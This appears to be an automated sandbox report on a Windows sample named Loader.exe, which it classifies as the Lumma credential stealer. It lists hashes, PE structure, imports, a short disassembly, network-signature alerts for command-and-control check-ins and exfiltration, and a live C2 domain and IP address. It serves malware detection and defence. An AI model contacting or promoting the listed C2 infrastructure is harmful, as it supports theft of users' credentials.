                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refLoader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://fancywaxxers.shop/api-Loader.exe, 00000003.00000003.2390068678.0000000002D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://fancywaxxers.shop/Loader.exe, 00000003.00000003.2336916157.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://fancywaxxers.shop:443/apiLoader.exe, 00000003.00000003.3047232037.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2337035887.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2421787457.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3277198269.0000000002CC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.80.1
                                                                                        fancywaxxers.shopUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582872
                                                                                        Start date and time:2024-12-31 17:37:18 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 13s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:6
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Loader.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 98%
                                                                                        • Number of executed functions: 51
                                                                                        • Number of non-executed functions: 121
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: Loader.exe
                                                                                        TimeTypeDescription
                                                                                        11:38:37API Interceptor8x Sleep call for process: Loader.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.80.1SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.dejikenkyu.cyou/pmpa/
                                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • hiranetwork.com/administrator/index.php
                                                                                        downloader2.htaGet hashmaliciousXWormBrowse
                                                                                        • 2k8u3.org/wininit.exe
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        fancywaxxers.shopSolara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.112.1
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 104.21.112.1
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.112.1
                                                                                        Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSLinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.75.163
                                                                                        Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.52.90
                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 104.21.24.64
                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                        • 172.64.41.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 172.67.217.81
                                                                                        http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                        • 104.16.79.73
                                                                                        http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 104.21.80.1
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        PO#5_tower_Dec162024.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                        • 104.21.80.1
                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.827208604265299
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:Loader.exe
                                                                                        File size:834'048 bytes
                                                                                        MD5:932410f2b859e916c9c7a8b801348466
                                                                                        SHA1:f59ac63b492dbc16a7eedd3d18efc59acf21a6a7
                                                                                        SHA256:17e94a7a504d2b8ab36914f0b5d2bebd9a2acd21533cfba1ca410c6594498272
                                                                                        SHA512:5fe38a836bf8a9baeae6066ed33262ec8352126608b0568243feed1b770282952670c35df6e7bd77dcf296aa26a478bafd0bc9123c4b4bcceb97aba67ee4fd1c
                                                                                        SSDEEP:24576:Y4dPpQPmY1dzvMoyZljM6ur1dzvMoyZljM6u+:hdPp/M5vMb3TuB5vMb3Tu+
                                                                                        TLSH:480512517982C0B3CC631AB759FDA3B5562EF9600B21A9DF47D40FBE6F621C05630B2A
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....rg.................H........................@.......................................@.....................................(..
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x40a2a0
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6772AADA [Mon Dec 30 14:14:50 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:d6bfc0ff235c28cc21f6045af30834e6
                                                                                        Instruction
                                                                                        call 00007F8C74DE5EDAh
                                                                                        jmp 00007F8C74DE5D3Dh
                                                                                        mov ecx, dword ptr [004307C0h]
                                                                                        push esi
                                                                                        push edi
                                                                                        mov edi, BB40E64Eh
                                                                                        mov esi, FFFF0000h
                                                                                        cmp ecx, edi
                                                                                        je 00007F8C74DE5ED6h
                                                                                        test esi, ecx
                                                                                        jne 00007F8C74DE5EF8h
                                                                                        call 00007F8C74DE5F01h
                                                                                        mov ecx, eax
                                                                                        cmp ecx, edi
                                                                                        jne 00007F8C74DE5ED9h
                                                                                        mov ecx, BB40E64Fh
                                                                                        jmp 00007F8C74DE5EE0h
                                                                                        test esi, ecx
                                                                                        jne 00007F8C74DE5EDCh
                                                                                        or eax, 00004711h
                                                                                        shl eax, 10h
                                                                                        or ecx, eax
                                                                                        mov dword ptr [004307C0h], ecx
                                                                                        not ecx
                                                                                        pop edi
                                                                                        mov dword ptr [00430800h], ecx
                                                                                        pop esi
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 14h
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        xorps xmm0, xmm0
                                                                                        push eax
                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                        call dword ptr [0042E8C8h]
                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                        mov dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E884h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E880h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                        push eax
                                                                                        call dword ptr [0042E910h]
                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                        xor eax, ecx
                                                                                        leave
                                                                                        ret
                                                                                        mov eax, 00004000h
                                                                                        ret
                                                                                        push 00431AB8h
                                                                                        call dword ptr [0042E8E8h]
                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        mov al, 01h
                                                                                        ret
                                                                                        push 00030000h
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6ac0x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b80.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2e8200x14c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x2479a0x24800e99bb4e274380b09613559d3b1a664fbFalse0.554781142979452data6.559742159760055IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x260000x9eb40xa0003f1d7f6413abea491661acb746eefebfFalse0.428271484375DOS executable (COM)4.91372050063646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x350000x1b800x1c006e4c901089600f702531dbe2643a65b6False0.7770647321428571data6.526735403310053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        .BSS0x370000x4ca000x4ca00a99b3517219a13803af8e050fd3ab6d9False1.000337734502447data7.999345576417738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .BSS0x840000x4ca000x4ca00a99b3517219a13803af8e050fd3ab6d9False1.000337734502447data7.999345576417738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                        DLLImport
                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-31T17:38:09.045715+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.5651731.1.1.153UDP
                                                                                        2024-12-31T17:38:09.546494+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549704104.21.80.1443TCP
                                                                                        2024-12-31T17:38:09.546494+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.80.1443TCP
                                                                                        2024-12-31T17:38:37.817926+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.80.1443TCP
                                                                                        2024-12-31T17:38:37.817926+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.80.1443TCP
                                                                                        2024-12-31T17:38:38.303746+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549781104.21.80.1443TCP
                                                                                        2024-12-31T17:38:38.303746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549781104.21.80.1443TCP
                                                                                        2024-12-31T17:38:38.773454+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549781104.21.80.1443TCP
                                                                                        2024-12-31T17:38:38.773454+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549781104.21.80.1443TCP
                                                                                        2024-12-31T17:38:39.548056+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549792104.21.80.1443TCP
                                                                                        2024-12-31T17:38:39.548056+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549792104.21.80.1443TCP
                                                                                        2024-12-31T17:38:40.377926+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549792104.21.80.1443TCP
                                                                                        2024-12-31T17:38:41.043154+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549800104.21.80.1443TCP
                                                                                        2024-12-31T17:38:41.043154+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549800104.21.80.1443TCP
                                                                                        2024-12-31T17:38:43.396652+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549815104.21.80.1443TCP
                                                                                        2024-12-31T17:38:43.396652+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549815104.21.80.1443TCP
                                                                                        2024-12-31T17:38:45.340382+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549827104.21.80.1443TCP
                                                                                        2024-12-31T17:38:45.340382+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549827104.21.80.1443TCP
                                                                                        2024-12-31T17:38:47.321564+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549842104.21.80.1443TCP
                                                                                        2024-12-31T17:38:47.321564+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549842104.21.80.1443TCP
                                                                                        2024-12-31T17:38:49.423943+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549858104.21.80.1443TCP
                                                                                        2024-12-31T17:38:49.423943+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549858104.21.80.1443TCP
                                                                                        2024-12-31T17:38:49.900923+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549858104.21.80.1443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:38:09.061798096 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.061851978 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:09.061917067 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.063419104 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.063429117 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:09.546410084 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:09.546494007 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.550839901 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.550856113 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:09.551166058 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:09.599746943 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.625580072 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.625636101 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:09.625771046 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:37.817931890 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:37.818041086 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:37.818108082 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:37.819994926 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:37.820018053 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:37.820040941 CET49704443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:37.820046902 CET44349704104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:37.831331968 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:37.831358910 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:37.831492901 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:37.831782103 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:37.831798077 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.303622961 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.303745985 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.314930916 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.314945936 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.315208912 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.326278925 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.326278925 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.326368093 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773473024 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773531914 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773575068 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773602009 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.773611069 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773622990 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773659945 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.773674965 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773730993 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773762941 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773777008 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.773785114 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.773802042 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.774180889 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.775634050 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.775643110 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.778109074 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.778158903 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.778166056 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.818531990 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.859980106 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.860043049 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.860152960 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.860152960 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.860208035 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.860438108 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.860459089 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:38.860471010 CET49781443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:38.860476971 CET44349781104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:39.091208935 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:39.091248989 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:39.091327906 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:39.091658115 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:39.091672897 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:39.547840118 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:39.548055887 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:39.595823050 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:39.595860004 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:39.596318007 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:39.598472118 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:39.598654032 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:39.602678061 CET44349792104.21.80.1192.168.2.5
